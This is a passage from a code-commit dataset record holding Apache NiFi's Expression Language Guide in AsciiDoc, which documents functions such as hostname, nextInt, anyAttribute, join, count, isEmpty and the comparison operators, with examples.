If `false`, or not specified,\n\tthe hostname will not be fully qualified. If the argument is `true` but the fully qualified hostname\n\tcannot be resolved, the simple hostname will be returned.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*:\n\n\t- [.argName]#_Fully Qualified_# : [.argDesc]#Optional parameter that specifies whether or not the hostname should be\n\t\tfully qualified. If not specified, defaults to false.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The fully qualified hostname of the machine can be obtained by using the Expression `${hostname(true)}`,\n\twhile the simple hostname can be obtained by using either `${hostname(false)}` or simply `${hostname()}`.\n\n\n\n\n\n[.function]\n=== UUID\n\n*Description*: [.description]#Returns a randomly generated UUID.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: ${UUID()} returns a value similar to de305d54-75b4-431b-adb2-eb6b9e546013\n\n\n\n\n\n[.function]\n=== nextInt\n\n*Description*: [.description]#Returns a one-up value (starting at 0) and increasing over the lifetime of the running instance of NiFi.\n\tThis value is not persisted across restarts and is not guaranteed to be unique across a cluster.\n\tThis value is considered \"one-up\" in that if called multiple times across the NiFi instance, the values will be sequential.\n\tHowever, this counter is shared across all NiFi components, so calling this function multiple times from one Processor will\n\tnot guarantee sequential values within the context of a particular Processor.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the previous value returned by `nextInt` was `5`, the Expression `${nextInt():divide(2)}` obtains the next available\n\tinteger (6) and divides the result by 2, returning a value of `3`.\n\n\n\n[.function]\n=== literal\n\n*Description*: [.description]#Returns its argument as a literal String value. This is useful in order to treat a string or a number\n\tat the beginning of an Expression as an actual value, rather than treating it as an attribute name. Additionally, it\n\tcan be used when the argument is an embedded Expression that we would then like to evaluate additional functions against.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to be treated as a literal string, number, or boolean value.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: `${literal(2):gt(1)}` returns `true`\n\n`${literal( ${allMatchingAttributes('a.*'):count()} ):gt(3)}` returns true if there are more than 3 attributes whose\nnames begin with the letter `a`.\n\n[.function]\n=== getStateValue\n\n*Description*: [.description]#Access a processor's state values by passing in the String key and getting the value back as a String. This\n is a special Expression Language function that only works with processors that explicitly allow EL to query state. Currently only UpdateAttribute\n does.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.String]#_Key_# : [.argDesc]#The key to use when accessing the state map.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: UpdateAttribute processor has stored the key \"count\" with value \"20\" in state. '${getStateValue(\"count\")}` returns `20`.\n\n\n\n[.function]\n=== thread\n\n*Description*: [.description]#Returns the name of the thread used by the processor when evaluating the Expression. This can be useful\n when using a processor with multiple concurrent tasks and where some data uniqueness is required.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: `${thread()}` could return something like `Timer-Driven Process Thread-4`.\n\n\n\n[[multi]]\n== Evaluating Multiple Attributes\n\nWhen it becomes necessary to evaluate the same conditions against multiple attributes, this can be accomplished by means of the\n`and` and `or` functions. However, this quickly becomes tedious, error-prone, and difficult to maintain. For this reason, NiFi\nprovides several functions for evaluating the same conditions against groups of attributes at the same time.\n\n\n\n\n[.function]\n=== anyAttribute\n\n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyAttribute Examples\n|=======================================================================\n| Expression | Value\n| `${anyAttribute(\"abc\", \"xyz\"):contains(\"bye\")}` | `true`\n| `${anyAttribute(\"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=======================================================================\n\n\n\n\n[.function]\n=== allAttributes\n\n*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.allAttributes Example\n|=============================================================================\n| Expression | Value\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\")}` | `true`\n| `${allAttributes(\"abc\", \"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=============================================================================\n\n\n\n\n\n[.function]\n=== anyMatchingAttribute\n\n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttribute Example\n|==============================================================\n| Expression | Value\n| `${anyMatchingAttribute(\"[ax].*\"):contains('bye')}` | `true`\n| `${anyMatchingAttribute(\".*\"):isNull()}` | `false`\n|==============================================================\n\n\n\n\n\n[.function]\n=== allMatchingAttributes\n\n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttributes Examples\n|==============================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):contains(\"world\")}` | `true`\n| `${allMatchingAttributes(\".*\"):isNull()}` | `false`\n| `${allMatchingAttributes(\"f.*\"):count()}` | `1`\n|==============================================================\n\n\n\n\n\n[.function]\n=== anyDelineatedValue\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against any of the individual values, returns `true`, this\n\tfunction returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression,\n\t\tthough it does not have to be.#\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"the,and,or,not\",\n\tconsider the following examples:\n\n.anyDelineatedValue Examples\n|===============================================================================\n| Expression | Value\n| `${anyDelineatedValue(\"${number_list}\", \",\"):contains(\"5\")}` | `true`\n| `${anyDelineatedValue(\"this that and\", \",\"):equals(\"${word_list}\")}` | `false`\n|===============================================================================\n\n\n\n[.function]\n=== allDelineatedValues\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against all of the individual values, returns `true` in each\n\tcase, then this function returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally\n\t\tan embedded Expression, though it does not have to be.#\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"those,known,or,not\",\n\tconsider the following examples:\n\n.allDelineatedValues Examples\n|===============================================================================\n| Expression | Value\n| `${allDelineatedValues(\"${word_list}\", \",\"):contains(\"o\")}` | `true`\n| `${allDelineatedValues(\"${number_list}\", \",\"):count()}` | `4`\n| `${allDelineatedValues(\"${number_list}\", \",\"):matches(\"[0-9]+\")}` | `true`\n| `${allDelineatedValues(\"${word_list}\", \",\"):matches('e')}` | `false`\n|===============================================================================\n\n\n\n\n[.function]\n=== join\n\n*Description*: [.description]#Aggregate function that concatenates multiple values with the specified delimiter. This function\n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The String delimiter to use when joining values#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.join Examples\n|=======================================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):join(\"-\")}` | `hello-good`\n| `${allAttributes(\"abc\", \"xyz\"):join(\" now\")}` | `hello world nowgood bye world now`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== count\n\n*Description*: [.description]#Aggregate function that counts the number of non-null, non-false values returned by the\n\t`allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`. This function\n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"number_list\" contains \"1,2,3,4,5\" consider the following examples:\n\n.count Examples\n|===========================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):count()}` | `2`\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\"):count()}` | `1`\n| `${allDelineatedValues(${number_list}, \",\"):count()}` | `5`\n| `${allAttributes(\"abc\", \"non-existent-attr\", \"xyz\"):count()}` | `2`\n| `${allMatchingAttributes(\".*\"):length():gt(10):count()}` | `2`\n|===========================================================================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e631c493d49ff71d4407eea281259bdfaeedd3c5","subject":"NIFI-218: Added isEmpty and replaceEmpty functions to doc","message":"NIFI-218: Added isEmpty and replaceEmpty functions to doc\n","repos":"ShellyLC\/nifi,YolandaMDavis\/nifi,MikeThomsen\/nifi,jskora\/nifi,WilliamNouet\/ApacheNiFi,aperepel\/nifi,jfrazee\/nifi,alopresto\/nifi,tequalsme\/nifi,aperepel\/nifi,jjmeyer0\/nifi,dlukyanov\/nifi,joetrite\/nifi,mcgilman\/nifi,trixpan\/nifi,josephxsxn\/nifi,InspurUSA\/nifi,tequalsme\/nifi,josephxsxn\/nifi,peter-gergely-horvath\/nifi,tijoparacka\/nifi,MikeThomsen\/nifi,MikeThomsen\/nifi,mcgilman\/nifi,PuspenduBanerjee\/nifi,pvillard31\/nifi,ShellyLC\/nifi,WilliamNouet\/ApacheNiFi,jfrazee\/nifi,bbende\/nifi,mattyb149\/nifi,tequalsme\/nifi,speddy93\/nifi,pvillard31\/nifi,mans2singh\/nifi,MikeThomsen\/nifi,PuspenduBanerjee\/nifi,mattyb149\/nifi,PuspenduBanerjee\/nifi,mattyb149\/nifi,WilliamNouet\/ApacheNiFi,bbende\/nifi,apsaltis\/nifi,josephxsxn\/nifi,WilliamNouet\/nifi,jskora\/nifi,patricker\/nifi,Xsixteen\/nifi,tequalsme\/nifi,bbende\/nifi,joetrite\/nifi,peter-gergely-horvath\/nifi,Wesley-Lawrence\/nifi,tequalsme\/nifi,josephxsxn\/nifi,mcgilman\/nifi,trixpan\/nifi,joetrite\/nifi,zhengsg\/nifi,jtstorck\/nifi,ijokarumawak\/nifi,peter-gergely-horvath\/nifi,jtstorck\/nifi,alopresto\/nifi,PuspenduBanerjee\/nifi,WilliamNouet\/nifi,zhengsg\/nifi,thesolson\/nifi,jfrazee\/nifi,ijokarumawak\/nifi,jfrazee\/nifi,bbende\/nifi,joetrite\/nifi,joewitt\/incubator-nifi,InspurUSA\/nifi,tijoparacka\/nifi,YolandaMDavis\/nifi,bbende\/nifi,speddy93\/nifi,m-hogue\/nifi,aperepel\/nifi,apsaltis\/nifi,jjmeyer0\/nifi,tijoparacka\/nifi,qfdk\/nifi,YolandaMDavis\/nifi,josephxsxn\/nifi,qfdk\/nifi,jtstorck\/nifi,YolandaMDavis\/nifi,jjmeyer0\/nifi,WilliamNouet\/nifi,MikeThomsen\/nifi,m-hogue\/nifi,alopresto\/nifi,jskora\/nifi,michalklempa\/nifi,WilliamNouet\/ApacheNiFi,michalklempa\/nifi,zhengsg\/nifi,ijokarumawak\/nifi,alopresto\/nifi,patricker\/nifi,michalklempa\/nifi,WilliamNouet\/nifi,jfrazee\/nifi,dlukyanov\/nifi,joetrite\/nifi,patricker\/nifi,jjmeyer0\/nifi,pvillard31\/nifi,jfrazee\/nifi,ShellyLC\/nifi,peter-gergely-horvath\/nifi,patricker\/nifi,Xsixteen\/nifi,Wesley-Lawrence\/nifi,joewitt\/incubator-nifi,jtstorck\/nifi,pvillard31\/nifi,jtstorck\/nifi,WilliamNouet\/ApacheNiFi,ShellyLC\/nifi,apsaltis\/nifi,mans2singh\/nifi,thesolson\/nifi,dlukyanov\/nifi,mattyb149\/nifi,mans2singh\/nifi,michalklempa\/nifi,tijoparacka\/nifi,peter-gergely-horvath\/nifi,m-hogue\/nifi,speddy93\/nifi,Wesley-Lawrence\/nifi,m-hogue\/nifi,dlukyanov\/nifi,MikeThomsen\/nifi,thesolson\/nifi,zhengsg\/nifi,joewitt\/incubator-nifi,Wesley-Lawrence\/nifi,alopresto\/nifi,MikeThomsen\/nifi,aperepel\/nifi,mattyb149\/nifi,Xsixteen\/nifi,mcgilman\/nifi,peter-gergely-horvath\/nifi,dlukyanov\/nifi,joetrite\/nifi,Wesley-Lawrence\/nifi,mcgilman\/nifi,trixpan\/nifi,ijokarumawak\/nifi,jtstorck\/nifi,patricker\/nifi,PuspenduBanerjee\/nifi,mattyb149\/nifi,michalklempa\/nifi,qfdk\/nifi,YolandaMDavis\/nifi,apsaltis\/nifi,tijoparacka\/nifi,qfdk\/nifi,Xsixteen\/nifi,ShellyLC\/nifi,YolandaMDavis\/nifi,m-hogue\/nifi,InspurUSA\/nifi,WilliamNouet\/nifi,jskora\/nifi,joewitt\/incubator-nifi,PuspenduBanerjee\/nifi,jjmeyer0\/nifi,speddy93\/nifi,tequalsme\/nifi,m-hogue\/nifi,jfrazee\/nifi,thesolson\/nifi,Wesley-Lawrence\/nifi,WilliamNouet\/nifi,WilliamNouet\/ApacheNiFi,trixpan\/nifi,ijokarumawak\/nifi,mans2singh\/nifi,jskora\/nifi,bbende\/nifi,dlukyanov\/nifi,mans2singh\/nifi,patricker\/nifi,alopresto\/nifi,thesolson\/nifi,alopresto\/nifi,pvillard31\/nifi,aperepel\/nifi,ShellyLC\/nifi,speddy93\/nifi,mans2singh\/nifi,pvillard31\/nifi,InspurUSA\/nifi,YolandaMDavis\/nifi,mattyb149\/nifi,Xsixteen\/nifi,pvillard31\/nifi,jjmeyer0\/nifi,mcgilman\/nifi,ijokarumawak\/nifi,jskora\/nifi,zhengsg\/nifi,apsaltis\/nifi,josephxsxn\/nifi,jfrazee\/nifi,m-hogue\/nifi,tijoparacka\/nifi,apsaltis\/nifi,aperepel\/nifi,patricker\/nifi,mcgilman\/nifi,thesolson\/nifi,joewitt\/incubator-nifi,pvillard31\/nifi,michalklempa\/nifi,InspurUSA\/nifi,zhengsg\/nifi,speddy93\/nifi,InspurUSA\/nifi,trixpan\/nifi,qfdk\/nifi,joewitt\/incubator-nifi,jtstorck\/nifi,trixpan\/nifi,Xsixteen\/nifi,qfdk\/nifi","old_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one or more\n\/\/ contributor license agreements. See the NOTICE file distributed with\n\/\/ this work for additional information regarding copyright ownership.\n\/\/ The ASF licenses this file to You under the Apache License, Version 2.0\n\/\/ (the \"License\"); you may not use this file except in compliance with\n\/\/ the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\nApache NiFi Expression Language Guide\n=====================================\nApache NiFi Team <dev@nifi.incubator.apache.org>\n:homepage: http:\/\/nifi.incubator.apache.org\n\n[[overview]]\nOverview\n--------\nAll data in Apache NiFi is represented by an abstraction called a FlowFile.\nA FlowFile is comprised of two major pieces: content and attributes.\nThe content portion of the FlowFile represents the data on which to operate.\nFor instance, if a file is picked up from a local file system using the\nGetFile Processor, the contents of the file will become the contents of the \nFlowFile.\n\nThe attributes portion of the FlowFile represents information about the data\nitself, or metadata. Attributes are key-value pairs that represent what is\nknown about the data as well as information that is useful for routing and\nprocessing the data appropriately.\nKeeping with the example of a file that is picked up from\na local file system, the FlowFile would have an attribute called `filename` that\nreflected the name of the file on the file system. Additionally, the FlowFile will\nhave a `path` attribute that reflects the directory on the file system that this\nfile lived in. The FlowFile will also have an attribute named `uuid`, which is a\nunique identifier for this FlowFile.\n\nHowever, placing these attributes on a FlowFile do not provide much benefit\nif the user is unable to make use of them. The NiFi Expression Language provides\nthe ability to reference these attributes, compare them to other values,\nand manipulate their values.\n\n\n[[structure]]\nStructure of a NiFi Expression\n------------------------------\n\nThe NiFi Expression Language always begins with the start delimiter `${` and ends\nwith the end delimiter `}`. Between the start and end delimiters is the text of the\nExpression itself. In its most basic form, the Expression can consist of just an\nattribute name. For example, `${filename}` will return the value of the ``filename''\nattribute.\n\nIn a slightly more complex example, we can instead return a manipulation of this value.\nWe can, for example, return an all upper-case version of the filename by calling the\n`toUpper` function: `${filename:toUpper()}`. In this case, we reference the ``filename''\nattribute and then manipulate this value by using the `toUpper` function. A function call\nconsists of 5 elements. First, there is a function call delimiter `:`. Second is the name\nof the function - in this case, ``toUpper''. Next is an open parenthesis (`(`), followed\nby the function arguments. The arguments necessary are dependent upon which function\nis being called. In this example, we are using the `toUpper` function, which does not\nhave any arguments, so this element is omitted. Finally, the closing parenthesis (`)`)\nindicates the end of the function call. There are many different functions that are supported\nby the Expression Language to achieve many different goals. Some functions provide String (text)\nmanipulation, such as the `toUpper` function. Others, such as the `equals` and `matches` functions,\nprovide comparison functionality. Functions also exist for manipulating dates and times and\nfor performing mathematical operations. Each of these functions is described below, in the\n<<functions> section, with an explanation of what the function does, the arguments that it \nrequires, and the type of information that it returns.\n\nWhen we perform a function call on an attribute, as above, we refer to the attribute as the\n_subject_ of the function, as the attribute is the entity on which the function is operating.\nWe can then chain together multiple function calls, where the return value of the first function\nbecomes the subject of the second function and its return value becomes the subject of the third\nfunction and so on. Continuing with our example, we can chain together multiple functions by using\nthe expression `${filename:toUpper():equals('HELLO.TXT')}`. There is no limit to the number of\nfunctions that can be chained together.\n\nAny FlowFile attribute can be referenced using the Expression Language. However, if the attribute\nname contains a ``special character,'' the attribute name must be escaped by quoting it. The following\ncharacters are each considered ``special characters'':\n\n- $ (dollar sign)\n- | (pipe)\n- { (open brace)\n- } (close brace)\n- ( (open parenthesis)\n- ) (close parenthesis)\n- [ (open bracket)\n- ] (close bracket)\n- , (comma)\n- : (colon)\n- ; (semicolon)\n- \/ (forward slash)\n- * (asterisk)\n- ' (single quote)\n- (space)\n- \\t (tab)\n- \\r (carriage return)\n- \\n (new-line)\n\nAdditionally, a number is considered a ``special character'' if it is the first character of the attribute name.\nIf any of these special characters is present in an attribute is quoted by using either single or double quotes.\nThe Expression Language allows single quotes and double quotes to be used interchangeably. For example, the following\ncan be used to escape an attribute named ``my attribute'': `${\"my attribute\"}` or `${'my attribute'}`.\n\nIn this example, the value to be returned is the value of the \"my attribute\" value, if it exists. If that attribute\ndoes not exist, the Expression Language will then look for a System Environment Variable named \"my attribute.\" If\nunable to find this, it will look for a JVM System Property named \"my attribute.\" Finally, if none of these exists,\nthe Expression Language will return a `null` value.\n\nThere also exist some functions that expect to have no subject. These functions are invoked simply\nby calling the function at the beginning of the Expression, such as `${hostname()}`. These functions\ncan then be changed together, as well. For example, `${hostname():toUpper()}`. Attempting to \nevaluate the function with subject will result in an error. In the <<functions>>\nsection below, these functions will clearly indicate in their descriptions that they do not\nrequire a subject.\n\nOften times, we will need to compare the values of two different attributes to each other. \nWe are able to accomplish this by using embedded Expressions. We can, for example, check if\nthe ``filename'' attribute is the same as the ``uuid'' attribute: `${filename:equals( ${uuid} )}`.\nNotice here, also, that we have a space between the opening parenthesis for the `equals` method and\nthe embedded Expression. This is not necessary and does not affect how the Expression is evaluated\nin any way. Rather, it is intended to make the Expression easier to read. White space is ignored by\nthe Expression Language between delimiters. Therefore, we can use the Expression\n`${ filename : equals(${ uuid}) }` or `${filename:equals(${uuid})}` and both Expressions\nmean the same thing. We cannot, however, use `${file name:equals(${uuid})}`, because this results\nin `file` and `name` being interpreted as different tokens, rather than a single token, `filename`.\n\n\n\n[[usage]]\n== Expression Language in the Application\n\nThe Expression Language is used heavily throughout the NiFi application for configuring Processor\nproperties. Not all Processor properties support the Expression Language, however. Whether or not\na Property supports the Expression Language is determined by the developer of the Processor when\nthe Processor is written. However, the application strives to clearly illustrate for each Property\nwhether or not the Expression Language is supported.\n\nIn the application, when configuring a Processor property, the User Interface provides an Information\nicon (\nimage:iconInfo.png[\"Info\"]\n) next to the name of the Property. Hovering over this icon with the mouse will provide a tooltip that\nprovides helpful information about the Property. This information includes a description of the Property,\nthe default value (if any), historically configured values (if any), and whether or not this Property\nsupports the expression language.\n\n\n[[editor]]\n=== Expression Language Editor\n\nWhen configuring the value of a Processor property, the NiFi User Interface provides help with the\nExpression Language using the Expression Language editor. Once an Expression is begin by typing `${`,\nthe editor begins to highlight parentheses and braces so that the user is easily able to tell which\nopening parenthesis or brace matches which closing parenthesis or brace.\n\nThe editor also supplies context-sensitive help by providing a list of all functions that can be used\nat the current cursor position. To activate this feature, press Ctrl+Space on the keyboard. The user\nis also able to type part of a function name and then press Ctrl+Space to see all functions that can\nbe used that start with the same prefix. For example, if we type into the editor `${filename:to`\nand then press Ctrl+Space, we are provided a pop-up that lists six different functions: `toDate`,\n`toLower`, `toNumber`, `toRadix`, `toString`, and `toUpper`. We can then continue typing to narrow\nwhich functions are shown, or we can select one of the functions from the list by double-clicking\nit with the mouse or using the arrow keys to highlight the desired function and pressing Enter.\n\n\n\n[[functions]]\n== Functions\n\nFunctions provide a convenient way to manipulate and compare values of attributes. The Expression Language\nprovides many different functions to meet the needs of a automated dataflow. Each function takes \nzero or more arguments and returns a single value. These functions can then be chained together to create\npowerful Expressions to evaluate conditions and manipulate values. See <<structure>> for more information \non how to call and chain functions together.\n\n[[types]]\n=== Data Types\n\nEach argument to a function and each value returned from a function has a specific data type. The Expression\nLanguage supports four different data types:\n\n- *String*: A String is a sequence of characters that can consist of numbers, letters, white space, and\n\tspecial characters.\n- *Number*: A Number is an integer comprised of one or more digits (`0` through `9`). The Expression Language \n\tdoes not provide support for fractional numbers. Dates and times are represented in the\n\tExpression Language as Numbers, representing the number of milliseconds since midnight GMT on January 1, 1970.\n- *Boolean*: A Boolean is one of either `true` or `false`.\n\nAll attributes are considered to be of type String.\n\nThe Expression Language is generally able to automatically coerce a value of one data type to the appropriate\ndata type for a function. However, functions do exist to manually coerce a value into a specific data type. \nSee the <<type_cast>> section for more information. \n\n\n\n\n\n\n[[boolean]]\n== Boolean Logic\n\nOne of the most powerful features of the Expression Language is the ability to compare an attribute value against\nsome other value. This is used often, for example, to configure how a Processor should route data. The following\nfunctions are used for performing boolean logic, such as comparing two values. \nEach of these functions returns a value of type Boolean.\n\n\n[.function]\n=== isNull\n*Description*: [.description]#The `isNull` function returns `true` if the subject is null, `false` otherwise. This is typically used to determine\nif an attribute exists.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\t`${filename:isNull()}` returns `true` if the \"filename\" attribute does not exist. \n\tIt returns `true` if the attribute exists.\n\n\n\n[.function]\n=== notNull\n*Description*: [.description]#The `notNull` function returns the opposite value of the `isNull` function. That is, it will return `true` if the\nsubject exists and `false` otherwise.#\n\t\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:notNull()}` returns `true` if the \"filename\" attribute exists. It returns \"false\" if the attribute\n\tdoes not exist.\n\n\n\n[.function]\n=== isEmpty\n*Description*: [.description]#The `isEmpty` function returns `true` if the Subject is null or contains only white-space\n\t(new line, carriage return, space, tab), `false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:isEmpty()}` returns `true` if the \"filename\" attribute does not exist or contains only\n\twhite space.\n\t\n\t\n\n\n[.function]\n=== equals\n\n[.description]\n*Description*: [.description]#The `equals` function is very widely used and determines if its subject is equal to another String value.\n\tNote that the `equals` function performs a direct comparison of two String values. Take care not to confuse this\n\tfunction with the <<matches>> function, which evaluates its subject against a Regular Expression.#\n\n[.subject]\t\n*Subject Type*: [.subject]#Any#\n\n[.arguments]\n*Arguments*:\n\t\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to. Must be same type as the Subject.#\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*:\nWe can check if the filename of a FlowFile is \"hello.txt\" by using the expression `${filename:equals('hello.txt')}`,\nor we could check if the value of the attribute `hello` is equal to the value of the `filename` attribute:\n`${hello:equals( ${filename} )}`.\n\n\n\n[.function]\n=== equalsIgnoreCase\n*Description*: [.description]#Similar to the `equals` function, the `equalsIgnoreCase` function compares its subject against a String value but returns\n`true` if the two values differ only by case (upper case vs. lower case).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:equalsIgnoreCase('hello.txt')}` will evaluate to `true` if filename is equal to \"hello.txt\" \n\tor \"HELLO.TXT\" or \"HeLLo.TxT\".\n\n\n\n\n[.function]\n=== gt\n*Description*: [.description]#The `gt` function is used for numeric comparison and returns `true` if the subject is Greater Than \n\tits argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:gt( 1024 )}` will return `true` if the size of the FlowFile's content is more than 1 kilobyte\n\t(1024 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== ge\n*Description*: [.description]#The `ge` function is used for numeric comparison and returns `true` if the subject is Greater Than \n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:ge( 1024 )}` will return `true` if the size of the FlowFile's content is at least (\n\tis greater than or equal to) 1 kilobyte (1024 bytes). Otherwise, it will return `false`.\n\n\n\n[.function]\n=== lt\n*Description*: [.description]#The `lt` function is used for numeric comparison and returns `true` if the subject is Less Than \n\tits argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:lt( 1048576 )}` will return `true` if the size of the FlowFile's content is less 